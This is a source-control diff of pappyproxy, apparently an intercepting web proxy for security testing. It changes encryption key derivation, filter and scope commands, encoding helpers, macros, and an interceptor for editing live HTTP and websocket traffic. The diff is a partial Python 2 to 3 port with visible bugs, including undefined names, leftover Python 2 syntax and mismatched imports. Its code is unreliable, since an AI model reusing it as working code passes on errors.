if not self.password:
self.get_password()
if not self.salt:
self.set_salt()
self.derive_key()
def get_password(self):
"""
Retrieve password from the user. Raise an exception if the
password is not capable of utf-8 encoding.
"""
encoded_passwd = ""
try:
passwd = getpass.getpass("Enter a password: ").strip()
self.password = passwd.encode("utf-8")
except:
raise PappyException("Invalid password, try again")
def set_salt(self):
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.set_salt_from_file()
os.chdir(self.config.crypt_dir)
elif os.path.isfile(self.config.crypt_file):
self.set_salt_from_file()
else:
self.salt = os.urandom(16)
def set_salt_from_file(self):
try:
# Seek to `salt_len` bytes before the EOF
# then read `salt_len` bytes to retrieve the salt
# WARNING: must open `crypt_file` in `rb` mode
# or `salt_file.seek()` will result in undefined
# behavior.
salt_file = open(self.config.crypt_file, 'rb')
sl = self.config.salt_len
# Negate the salt length to seek to the
# correct position in the buffer
salt_file.seek(-sl, 2)
self.salt = salt_file.read(sl)
salt_file.close()
except:
cf = self.config.crypt_file
raise PappyException("Unable to read %s" % cf)
def create_salt_file(self):
salt_file = open(self.config.crypt_file, 'a')
salt_file.write(self.salt)
salt_file.close()
def derive_key(self):
"""
Derive a key sufficient for use as a cryptographic key
used to encrypt the project (currently: cryptography.Fernet).
cryptography.Fernet utilizes AES-CBC-128, requiring a 32-byte key.
Parameter notes from the py-scrypt source-code:
https://bitbucket.org/mhallin/py-scrypt/
Compute scrypt(password, salt, N, r, p, buflen).
The parameters r, p, and buflen must satisfy r * p < 2^30 and
buflen <= (2^32 - 1) * 32. The parameter N must be a power of 2
greater than 1. N, r and p must all be positive.
Notes for Python 2:
- `password` and `salt` must be str instances
- The result will be a str instance
Notes for Python 3:
- `password` and `salt` can be both str and bytes. If they are str
instances, they wil be encoded with utf-8.
- The result will be a bytes instance
Exceptions raised:
- TypeError on invalid input
- scrypt.error if scrypt failed
"""
try:
if not self.key:
shash = scrypt.hash(self.password, self.salt, buflen=32)
self.key = b64encode(shash)
except TypeError as e:
raise PappyException("Scrypt failed with type error: ", e)
except scrypt.error, e:
raise PappyException("Scrypt failed with internal error: ", e)
def delete_clear_files(self):
"""
Deletes all clear-text files left in the project directory.
"""
shutil.rmtree(self.config.crypt_dir)
os.remove(self.config.archive)
def delete_crypt_files(self):
"""
Deletes all encrypted-text files in the project directory.
Forces generation of new salt after opening and closing the project.
Adds security in the case of a one-time compromise of the system.
"""
os.remove(self.config.crypt_file)

3
pappyproxy/default_global_config.json
Unescape View File

@ -1,3 +0,0 @@
{
"cache_size": 2000
}

9
pappyproxy/default_user_config.json
Unescape View File

@ -1,9 +0,0 @@
{
"data_file": "./data.db",
"cert_dir": "{DATADIR}/certs",
"history_size": 1000,
"proxy_listeners": [
{"port": 8000, "interface": "127.0.0.1"}
],
"socks_proxy": null
}

3660
pappyproxy/http.py
View File

File diff suppressed because it is too large Load Diff

BIN
pappyproxy/interface/__pycache__/context.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/decode.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/macros.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/mangle.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/misc.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/tags.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/test.cpython-35.pyc
View File

Binary file not shown.

BIN
pappyproxy/interface/__pycache__/view.cpython-35.pyc
View File

Binary file not shown.

245
pappyproxy/interface/context.py
Unescape View File

@ -0,0 +1,245 @@
from itertools import groupby
from ..proxy import InvalidQuery, time_to_nsecs
from ..colors import Colors, Styles
# class BuiltinFilters(object):
# _filters = {
# 'not_image': (
# ['path nctr "(\.png$|\.jpg$|\.gif$)"'],
# 'Filter out image requests',
# ),
# 'not_jscss': (
# ['path nctr "(\.js$|\.css$)"'],
# 'Filter out javascript and css files',
# ),
# }
# @staticmethod
# @defer.inlineCallbacks
# def get(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('%s not a bult in filter' % name)
# if name in BuiltinFilters._filters:
# filters = [pappyproxy.context.Filter(f) for f in BuiltinFilters._filters[name][0]]
# for f in filters:
# yield f.generate()
# defer.returnValue(filters)
# raise PappyException('"%s" is not a built-in filter' % name)
# @staticmethod
# def list():
# return [k for k, v in BuiltinFilters._filters.iteritems()]
# @staticmethod
# def help(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('"%s" is not a built-in filter' % name)
# return pappyproxy.context.Filter(BuiltinFilters._filters[name][1])
# def complete_filtercmd(text, line, begidx, endidx):
# strs = [k for k, v in pappyproxy.context.Filter._filter_functions.iteritems()]
# strs += [k for k, v in pappyproxy.context.Filter._async_filter_functions.iteritems()]
# return autocomplete_startswith(text, strs)
# def complete_builtin_filter(text, line, begidx, endidx):
# all_names = BuiltinFilters.list()
# if not text:
# ret = all_names[:]
# else:
# ret = [n for n in all_names if n.startswith(text)]
# return ret
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def builtin_filter(line):
# if not line:
# raise PappyException("Filter name required")
# filters_to_add = yield BuiltinFilters.get(line)
# for f in filters_to_add:
# print f.filter_string
# yield pappyproxy.pappy.main_context.add_filter(f)
# defer.returnValue(None)
def filtercmd(client, args):
"""
Apply a filter to the current context
Usage: filter <filter string>
See README.md for information on filter strings
"""
try:
phrases = [list(group) for k, group in groupby(args, lambda x: x == "OR") if not k]
for phrase in phrases:
# we do before/after by id not by timestamp
if phrase[0] in ('before', 'b4', 'after', 'af') and len(phrase) > 1:
r = client.req_by_id(phrase[1], headers_only=True)
phrase[1] = str(time_to_nsecs(r.time_start))
client.context.apply_phrase(phrases)
except InvalidQuery as e:
print(e)
def filter_up(client, args):
"""
Remove the last applied filter
Usage: filter_up
"""
client.context.pop_phrase()
def filter_clear(client, args):
"""
Reset the context so that it contains no filters (ignores scope)
Usage: filter_clear
"""
client.context.set_query([])
def filter_list(client, args):
"""
Print the filters that make up the current context
Usage: filter_list
"""
from ..util import print_query
print_query(client.context.query)
def scope_save(client, args):
"""
Set the scope to be the current context. Saved between launches
Usage: scope_save
"""
client.set_scope(client.context.query)
def scope_reset(client, args):
"""
Set the context to be the scope (view in-scope items)
Usage: scope_reset
"""
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope. Cannot set context to scope.")
return
client.context.set_query(result.filter)
def scope_delete(client, args):
"""
Delete the scope so that it contains all request/response pairs
Usage: scope_delete
"""
client.set_scope([])
def scope_list(client, args):
"""
Print the filters that make up the scope
Usage: scope_list
"""
from ..util import print_query
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope")
return
print_query(result.filter)
def list_saved_queries(client, args):
from ..util import print_query
queries = client.all_saved_queries()
print('')
for q in queries:
print(Styles.TABLE_HEADER + q.name + Colors.ENDC)
print_query(q.query)
print('')
def save_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name to save filters as")
return
client.save_query(args[0], client.context.query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(client.context.query)
print('')
def load_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name of query to load")
return
new_query = client.load_query(args[0])
client.context.set_query(new_query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(new_query)
print('')
def delete_query(client, args):
if len(args) != 1:
print("Must give name of filter")
return
client.delete_query(args[0])
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def filter_prune(line):
# """
# Delete all out of context requests from the data file.
# CANNOT BE UNDONE!! Be careful!
# Usage: filter_prune
# """
# # Delete filtered items from datafile
# print ''
# print 'Currently active filters:'
# for f in pappyproxy.pappy.main_context.active_filters:
# print '> %s' % f.filter_string
# # We copy so that we're not removing items from a set we're iterating over
# act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
# inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
# message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
# #print message
# if not confirm(message, 'n'):
# defer.returnValue(None)
# for reqid in inact_reqs:
# try:
# req = yield pappyproxy.http.Request.load_request(reqid)
# yield req.deep_delete()
# except PappyException as e:
# print e
# print 'Deleted %d requests' % len(inact_reqs)
# defer.returnValue(None)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
#'filter': (filtercmd, complete_filtercmd),
'filter': (filtercmd, None),
'filter_up': (filter_up, None),
'filter_list': (filter_list, None),
'filter_clear': (filter_clear, None),
'scope_list': (scope_list, None),
'scope_delete': (scope_delete, None),
'scope_reset': (scope_reset, None),
'scope_save': (scope_save, None),
'list_saved_queries': (list_saved_queries, None),
# 'filter_prune': (filter_prune, None),
# 'builtin_filter': (builtin_filter, complete_builtin_filter),
'save_query': (save_query, None),
'load_query': (load_query, None),
'delete_query': (delete_query, None),
})
cmd.add_aliases([
('filter', 'f'),
('filter', 'fl'),
('filter_up', 'fu'),
('filter_list', 'fls'),
('filter_clear', 'fc'),
('scope_list', 'sls'),
('scope_reset', 'sr'),
('list_saved_queries', 'sqls'),
# ('builtin_filter', 'fbi'),
('save_query', 'sq'),
('load_query', 'lq'),
('delete_query', 'dq'),
])

157
pappyproxy/plugins/decode.py → pappyproxy/interface/decode.py
Unescape View File

@ -1,5 +1,4 @@
import HTMLParser
import StringIO
import html
import base64
import datetime
import gzip
@ -7,31 +6,33 @@ import shlex
import string
import urllib
from pappyproxy.util import PappyException, hexdump, printable_data, copy_to_clipboard, clipboard_contents
from ..util import hexdump, printable_data, copy_to_clipboard, clipboard_contents, encode_basic_auth, parse_basic_auth
from ..console import CommandError
from io import StringIO
def print_maybe_bin(s):
binary = False
for c in s:
if c not in string.printable:
if chr(c) not in string.printable:
binary = True
break
if binary:
print hexdump(s)
print(hexdump(s))
else:
print s
print(s.decode())
def asciihex_encode_helper(s):
return ''.join('{0:x}'.format(ord(c)) for c in s)
return ''.join('{0:x}'.format(c) for c in s).encode()
def asciihex_decode_helper(s):
ret = []
try:
for a, b in zip(s[0::2], s[1::2]):
c = a+b
c = chr(a)+chr(b)
ret.append(chr(int(c, 16)))
return ''.join(ret)
return ''.join(ret).encode()
except Exception as e:
raise PappyException(e)
raise CommandError(e)
def gzip_encode_helper(s):
out = StringIO.StringIO()
@ -54,203 +55,223 @@ def base64_decode_helper(s):
return s_padded
except:
pass
raise PappyException("Unable to base64 decode string")
raise CommandError("Unable to base64 decode string")
def url_decode_helper(s):
bs = s.decode()
return urllib.parse.unquote(bs).encode()
def url_encode_helper(s):
bs = s.decode()
return urllib.parse.quote_plus(bs).encode()
def html_encode_helper(s):
return ''.join(['&#x{0:x};'.format(ord(c)) for c in s])
return ''.join(['&#x{0:x};'.format(c) for c in s]).encode()
def html_decode_helper(s):
return HTMLParser.HTMLParser().unescape(s)
return html.unescape(s.decode()).encode()
def _code_helper(line, func, copy=True):
args = shlex.split(line)
if not args:
s = clipboard_contents()
print 'Will decode:'
print printable_data(s)
def _code_helper(args, func, copy=True):
if len(args) == 0:
s = clipboard_contents().encode()
print('Will decode:')
print(printable_data(s))
s = func(s)
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
else:
s = func(args[0].strip())
s = func(args[0].encode())
if copy:
try:
copy_to_clipboard(s)
except:
print 'Result cannot be copied to the clipboard. Result not copied.'
except Exception as e:
print('Result cannot be copied to the clipboard. Result not copied.')
raise e
return s
def base64_decode(line):
def base64_decode(client, args):
"""
Base64 decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64_decode_helper))
print_maybe_bin(_code_helper(args, base64_decode_helper))
def base64_encode(line):
def base64_encode(client, args):
"""
Base64 encode a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, base64.b64encode))
print_maybe_bin(_code_helper(args, base64.b64encode))
def url_decode(line):
def url_decode(client, args):
"""
URL decode a string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.unquote))
print_maybe_bin(_code_helper(args, url_decode_helper))
def url_encode(line):
def url_encode(client, args):
"""
URL encode special characters in a string.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, urllib.quote_plus))
print_maybe_bin(_code_helper(args, url_encode_helper))
def asciihex_decode(line):
def asciihex_decode(client, args):
"""
Decode an ascii hex string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_decode_helper))
print_maybe_bin(_code_helper(args, asciihex_decode_helper))
def asciihex_encode(line):
def asciihex_encode(client, args):
"""
Convert all the characters in a line to hex and combine them.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, asciihex_encode_helper))
print_maybe_bin(_code_helper(args, asciihex_encode_helper))
def html_decode(line):
def html_decode(client, args):
"""
Decode an html encoded string.
If no string is given, will decode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_decode_helper))
print_maybe_bin(_code_helper(args, html_decode_helper))
def html_encode(line):
def html_encode(client, args):
"""
Encode a string and escape html control characters.
If no string is given, will encode the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, html_encode_helper))
print_maybe_bin(_code_helper(args, html_encode_helper))
def gzip_decode(line):
def gzip_decode(client, args):
"""
Un-gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_decode_helper))
print_maybe_bin(_code_helper(args, gzip_decode_helper))
def gzip_encode(line):
def gzip_encode(client, args):
"""
Gzip a string.
If no string is given, will decompress the contents of the clipboard.
Results are NOT copied to the clipboard.
"""
print_maybe_bin(_code_helper(line, gzip_encode_helper, copy=False))
print_maybe_bin(_code_helper(args, gzip_encode_helper, copy=False))
def base64_decode_raw(line):
def base64_decode_raw(client, args):
"""
Same as base64_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64_decode_helper, copy=False)
print(_code_helper(args, base64_decode_helper, copy=False))
def base64_encode_raw(line):
def base64_encode_raw(client, args):
"""
Same as base64_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, base64.b64encode, copy=False)
print(_code_helper(args, base64.b64encode, copy=False))
def url_decode_raw(line):
def url_decode_raw(client, args):
"""
Same as url_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.unquote, copy=False)
print(_code_helper(args, url_decode_helper, copy=False))
def url_encode_raw(line):
def url_encode_raw(client, args):
"""
Same as url_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, urllib.quote_plus, copy=False)
print(_code_helper(args, url_encode_helper, copy=False))
def asciihex_decode_raw(line):
def asciihex_decode_raw(client, args):
"""
Same as asciihex_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_decode_helper, copy=False)
print(_code_helper(args, asciihex_decode_helper, copy=False))
def asciihex_encode_raw(line):
def asciihex_encode_raw(client, args):
"""
Same as asciihex_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, asciihex_encode_helper, copy=False)
print(_code_helper(args, asciihex_encode_helper, copy=False))
def html_decode_raw(line):
def html_decode_raw(client, args):
"""
Same as html_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_decode_helper, copy=False)
print(_code_helper(args, html_decode_helper, copy=False))
def html_encode_raw(line):
def html_encode_raw(client, args):
"""
Same as html_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, html_encode_helper, copy=False)
print(_code_helper(args, html_encode_helper, copy=False))
def gzip_decode_raw(line):
def gzip_decode_raw(client, args):
"""
Same as gzip_decode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_decode_helper, copy=False)
print(_code_helper(args, gzip_decode_helper, copy=False))
def gzip_encode_raw(line):
def gzip_encode_raw(client, args):
"""
Same as gzip_encode but the output will never be printed as a hex dump and
results will not be copied. It is suggested you redirect the output
to a file.
"""
print _code_helper(line, gzip_encode_helper, copy=False)
print(_code_helper(args, gzip_encode_helper, copy=False))
def unix_time_decode_helper(line):
unix_time = int(line.strip())
dtime = datetime.datetime.fromtimestamp(unix_time)
return dtime.strftime('%Y-%m-%d %H:%M:%S')
def unix_time_decode(line):
print _code_helper(line, unix_time_decode_helper)
def unix_time_decode(client, args):
print(_code_helper(args, unix_time_decode_helper))
def http_auth_encode(client, args):
if len(args) != 2:
raise CommandError('Usage: http_auth_encode <username> <password>')
username, password = args
print(encode_basic_auth(username, password))
def http_auth_decode(client, args):
username, password = decode_basic_auth(args[0])
print(username)
print(password)
def load_cmds(cmd):
cmd.set_cmds({
@ -275,6 +296,8 @@ def load_cmds(cmd):
'gzip_decode_raw': (gzip_decode_raw, None),
'gzip_encode_raw': (gzip_encode_raw, None),
'unixtime_decode': (unix_time_decode, None),
'httpauth_encode': (http_auth_encode, None),
'httpauth_decode': (http_auth_decode, None)
})
cmd.add_aliases([
('base64_decode', 'b64d'),
@ -298,4 +321,6 @@ def load_cmds(cmd):
('gzip_decode_raw', 'gzdr'),
('gzip_encode_raw', 'gzer'),
('unixtime_decode', 'uxtd'),
('httpauth_encode', 'hae'),
('httpauth_decode', 'had'),
])

150
pappyproxy/interface/macros.py
Unescape View File

@ -0,0 +1,150 @@
from ..util import load_reqlist
from ..macros import macro_from_requests, MacroTemplate, load_macros
from ..colors import Colors
macro_dict = {}
int_macro_dict = {}
int_conns = {}
def generate_macro(client, args):
if len(args) == 0:
print("usage: gma [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs)
fname = MacroTemplate.template_filename('macro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def generate_int_macro(client, args):
if len(args) == 0:
print("usage: gima [name] [reqids]")
return
macro_name = args[0]
reqs = [r for r in load_reqlist(client, ','.join(args[1:]))]
script_string = macro_from_requests(reqs, template='intmacro')
fname = MacroTemplate.template_filename('intmacro', macro_name)
with open(fname, 'w') as f:
f.write(script_string)
print("Macro written to {}".format(fname))
def load_macros_cmd(client, args):
global macro_dict
load_dir = '.'
if len(args) > 0:
load_dir = args[0]
_stop_all_int_macros()
loaded_macros, loaded_int_macros = load_macros(load_dir, client)
for macro in loaded_macros:
macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
for macro in loaded_int_macros:
int_macro_dict[macro.name] = macro
print("Loaded {} ({})".format(macro.name, macro.file_name))
def complete_run_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global macro_dict
strs = macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_macro(client, args):
global macro_dict
if len(args) == 0:
print("usage: rma [macro name]")
return
macro = macro_dict[args[0]]
macro.execute(client, args[1:])
def complete_run_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global int_macro_dict
strs = int_macro_dict.keys()
return autocomplete_startswith(text, strs)
def run_int_macro(client, args):
global int_macro_dict
global int_conns
if len(args) == 0:
print("usage: rim [macro name]")
return
if args[0] in int_conns:
print("%s is already running!" % args[0])
return
macro = int_macro_dict[args[0]]
macro.init(args[1:])
conn = client.new_conn()
int_conns[args[0]] = conn
conn.intercept(macro)
print("Started %s" % args[0])
def complete_stop_int_macro(text, line, begidx, endidx):
from ..util import autocomplete_starts_with
global int_conns
strs = int_conns.keys()
return autocomplete_startswith(text, strs)
def stop_int_macro(client, args):
global int_conns
if len(args) > 0:
conn = int_conns[args[0]]
conn.close()
del int_conns[args[0]]
print("Stopped %s" % args[0])
else:
_stop_all_int_macros()
def _stop_all_int_macros():
global int_conns
for k, conn in int_conns.items():
conn.close()
del int_conns[k]
print("Stopped %s" % k)
def list_macros(client, args):
global macro_dict
global int_macro_dict
global int_conns
if len(macro_dict) > 0:
print('Loaded Macros:')
for k, m in macro_dict.items():
print(' '+k)
if len(int_macro_dict) > 0:
print('Loaded Intercepting Macros:')
for k, m in int_macro_dict.items():
pstr = ' '+k
if k in int_conns:
pstr += ' (' + Colors.GREEN + 'RUNNING' + Colors.ENDC + ')'
print(pstr)
def load_cmds(cmd):
cmd.set_cmds({
'generate_macro': (generate_macro, None),
'generate_int_macro': (generate_int_macro, None),
'load_macros': (load_macros_cmd, None),
'run_macro': (run_macro, complete_run_macro),
'run_int_macro': (run_int_macro, complete_run_int_macro),
'stop_int_macro': (stop_int_macro, complete_stop_int_macro),
'list_macros': (list_macros, None),
})
cmd.add_aliases([
('generate_macro', 'gma'),
('generate_int_macro', 'gima'),
('load_macros', 'lma'),
('run_macro', 'rma'),
('run_int_macro', 'rim'),
('stop_int_macro', 'sim'),
('list_macros', 'lsma'),
])

325
pappyproxy/interface/mangle.py
Unescape View File

@ -0,0 +1,325 @@
import curses
import os
import subprocess
import tempfile
import threading
from ..macros import InterceptMacro
from ..proxy import MessageError, parse_request, parse_response
from ..colors import url_formatter
edit_queue = []
class InterceptorMacro(InterceptMacro):
"""
A class representing a macro that modifies requests as they pass through the
proxy
"""
def __init__(self):
InterceptMacro.__init__(self)
self.name = "InterceptorMacro"
def mangle_request(self, request):
# This function gets called to mangle/edit requests passed through the proxy
# Write original request to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(request.full_message())
mangled_req = request
front = False
while True:
# Have the console edit the file
event = edit_file(tfName, front=front)
event.wait()
if event.canceled:
return request
# Create new mangled request from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
return None
try:
mangled_req = parse_request(text)
except MessageError as e:
print("could not parse request: %s" % str(e))
front = True
continue
mangled_req.dest_host = request.dest_host
mangled_req.dest_port = request.dest_port
mangled_req.use_tls = request.use_tls
break
return mangled_req
def mangle_response(self, request, response):
# This function gets called to mangle/edit respones passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(response.full_message())
mangled_rsp = response
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return response
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
os.remove(tfName)
# Check if dropped
if text == '':
return None
try:
mangled_rsp = parse_response(text)
except MessageError as e:
print("could not parse response: %s" % str(e))
front = True
continue
break
return mangled_rsp
def mangle_websocket(self, request, response, message):
# This function gets called to mangle/edit respones passed through the proxy
# Write original response to the temp file
with tempfile.NamedTemporaryFile(delete=False) as tf:
tfName = tf.name
tf.write(b"# ")
if message.to_server:
tf.write(b"OUTGOING to")
else:
tf.write(b"INCOMING from")
desturl = 'ws' + url_formatter(request)[4:] # replace http:// with ws://
tf.write(b' ' + desturl.encode())
tf.write(b" -- Note that this line is ignored\n")
tf.write(message.message)
mangled_msg = message
while True:
# Have the console edit the file
event = edit_file(tfName, front=True)
event.wait()
if event.canceled:
return message
# Create new mangled response from edited file
with open(tfName, 'rb') as f:
text = f.read()
_, text = text.split(b'\n', 1)
os.remove(tfName)
# Check if dropped
if text == '':
return None
mangled_msg.message = text
# if messages can be invalid, check for it here and continue if invalid
break
return mangled_msg
class EditEvent:
def __init__(self):
self.e = threading.Event()
self.canceled = False
def wait(self):
self.e.wait()
def set(self):
self.e.set()
def cancel(self):
self.canceled = True
self.set()
###############
## Helper funcs
def edit_file(fname, front=False):
global edit_queue
# Adds the filename to the edit queue. Returns an event that is set once
# the file is edited and the editor is closed
#e = threading.Event()
e = EditEvent()
if front:
edit_queue = [(fname, e, threading.current_thread())] + edit_queue
else:
edit_queue.append((fname, e, threading.current_thread()))
return e
def execute_repeater(client, reqid):
#script_loc = os.path.join(pappy.session.config.pappy_dir, "plugins", "vim_repeater", "repeater.vim")
maddr = client.maddr
if maddr is None:
print("Client has no message address, cannot run repeater")
return
storage, reqid = client.parse_reqid(reqid)
script_loc = os.path.join(os.path.dirname(os.path.realpath(__file__)),
"repeater", "repeater.vim")
args = (["vim", "-S", script_loc, "-c", "RepeaterSetup %s %s %s"%(reqid, storage.storage_id, client.maddr)])
subprocess.call(args)
class CloudToButt(InterceptMacro):
def __init__(self):
InterceptMacro.__init__(self)
self.name = 'cloudtobutt'
self.intercept_requests = True
self.intercept_responses = True
self.intercept_ws = True
def mangle_response(self, request, response):
response.body = response.body.replace(b"cloud", b"butt")
response.body = response.body.replace(b"Cloud", b"Butt")
return response
def mangle_request(self, request):
request.body = request.body.replace(b"foo", b"bar")
request.body = request.body.replace(b"Foo", b"Bar")
return request
def mangle_websocket(self, request, response, wsm):
wsm.message = wsm.message.replace(b"world", b"zawarudo")
wsm.message = wsm.message.replace(b"zawarudo", b"ZAWARUDO")
return wsm
def repeater(client, args):
"""
Open a request in the repeater
Usage: repeater <reqid>
"""
# This is not async on purpose. start_editor acts up if this is called
# with inline callbacks. As a result, check_reqid and get_unmangled
# cannot be async
reqid = args[0]
req = client.req_by_id(reqid)
execute_repeater(client, reqid)
def intercept(client, args):
"""
Intercept requests and/or responses and edit them with before passing them along
Usage: intercept <reqid>
"""
global edit_queue
req_names = ('req', 'request', 'requests')
rsp_names = ('rsp', 'response', 'responses')
ws_names = ('ws', 'websocket')
mangle_macro = InterceptorMacro()
if any(a in req_names for a in args):
mangle_macro.intercept_requests = True
if any(a in rsp_names for a in args):
mangle_macro.intercept_responses = True
if any(a in ws_names for a in args):
mangle_macro.intercept_ws = True
if not args:
mangle_macro.intercept_requests = True
intercepting = []
if mangle_macro.intercept_requests:
intercepting.append('Requests')
if mangle_macro.intercept_responses:
intercepting.append('Responses')
if mangle_macro.intercept_ws:
intercepting.append('Websocket Messages')
if not mangle_macro.intercept_requests and not mangle_macro.intercept_responses and not mangle_macro.intercept_ws:
intercept_str = 'NOTHING WHY ARE YOU DOING THIS' # WHYYYYYYYY
else:
intercept_str = ', '.join(intercepting)
## Interceptor loop
stdscr = curses.initscr()
curses.noecho()
curses.cbreak()
stdscr.nodelay(True)
conn = client.new_conn()
try:
conn.intercept(mangle_macro)
editnext = False
while True:
stdscr.addstr(0, 0, "Currently intercepting: %s" % intercept_str)
stdscr.clrtoeol()
stdscr.addstr(1, 0, "%d item(s) in queue." % len(edit_queue))
stdscr.clrtoeol()
if editnext:
stdscr.addstr(2, 0, "Waiting for next item... Press 'q' to quit or 'b' to quit waiting")
else:
stdscr.addstr(2, 0, "Press 'n' to edit the next item or 'q' to quit interceptor.")
stdscr.clrtoeol()
c = stdscr.getch()
if c == ord('q'):
return
elif c == ord('n'):
editnext = True
elif c == ord('b'):
editnext = False
if editnext and edit_queue:
editnext = False
(to_edit, event, t) = edit_queue.pop(0)
editor = 'vi'
if 'EDITOR' in os.environ:
editor = os.environ['EDITOR']
additional_args = []
if editor == 'vim':
# prevent adding additional newline
additional_args.append('-b')
subprocess.call([editor, to_edit] + additional_args)
stdscr.clear()
event.set()
t.join()
finally:
conn.close()
# Now that the connection is closed, make sure the rest of the threads finish/error out
while len(edit_queue) > 0:
(fname, event, t) = edit_queue.pop(0)
event.cancel()
t.join()
curses.nocbreak()
stdscr.keypad(0)
curses.echo()
curses.endwin()
###############
## Plugin hooks
def test_macro(client, args):
c2b = CloudToButt()
conn = client.new_conn()
with client.new_conn() as conn:
conn.intercept(c2b)
print("intercept started")
input("Press enter to quit...")
print("past raw input")
def load_cmds(cmd):
cmd.set_cmds({
'intercept': (intercept, None),
'c2b': (test_macro, None),
'repeater': (repeater, None),
})
cmd.add_aliases([
('intercept', 'ic'),
('repeater', 'rp'),
])

187
pappyproxy/interface/misc.py
Unescape View File

@ -0,0 +1,187 @@
import argparse
import sys
import tempfile
import subprocess
from ..util import copy_to_clipboard, confirm, printable_data, Capturing, load_reqlist
from ..console import CommandError
from ..proxy import InterceptMacro
from ..colors import url_formatter, verb_color, Colors, scode_color
class WatchMacro(InterceptMacro):
def __init__(self, client):
InterceptMacro.__init__(self)
self.name = "WatchMacro"
self.client = client
def mangle_request(self, request):
if self.client.is_in_context(request):
printstr = "> "
printstr += verb_color(request.method) + request.method + Colors.ENDC + " "
printstr += url_formatter(request, colored=True)
print(printstr)
return request
def mangle_response(self, request, response):
if self.client.is_in_context(request):
printstr = "< "
printstr += verb_color(request.method) + request.method + Colors.ENDC + ' '
printstr += url_formatter(request, colored=True)
printstr += " \u2192 "
response_code = str(response.status_code) + ' ' + response.reason
response_code = scode_color(response_code) + response_code + Colors.ENDC
printstr += response_code
print(printstr)
return response
def mangle_websocket(self, request, response, message):
if self.client.is_in_context(request):
printstr = ""
if message.to_server:
printstr += ">"
else:
printstr += "<"
printstr += "ws(b={}) ".format(message.is_binary)
printstr += printable_data(message.message)
print(printstr)
return message
def message_address(client, args):
msg_addr = client.maddr
if msg_addr is None:
print("Client has no message address")
return
print(msg_addr)
if len(args) > 0 and args[0] == "-c":
try:
copy_to_clipboard(msg_addr.encode())
print("Copied to clipboard!")
except:
print("Could not copy address to clipboard")
def ping(client, args):
print(client.ping())
def watch(client, args):
macro = WatchMacro(client)
macro.intercept_requests = True
macro.intercept_responses = True
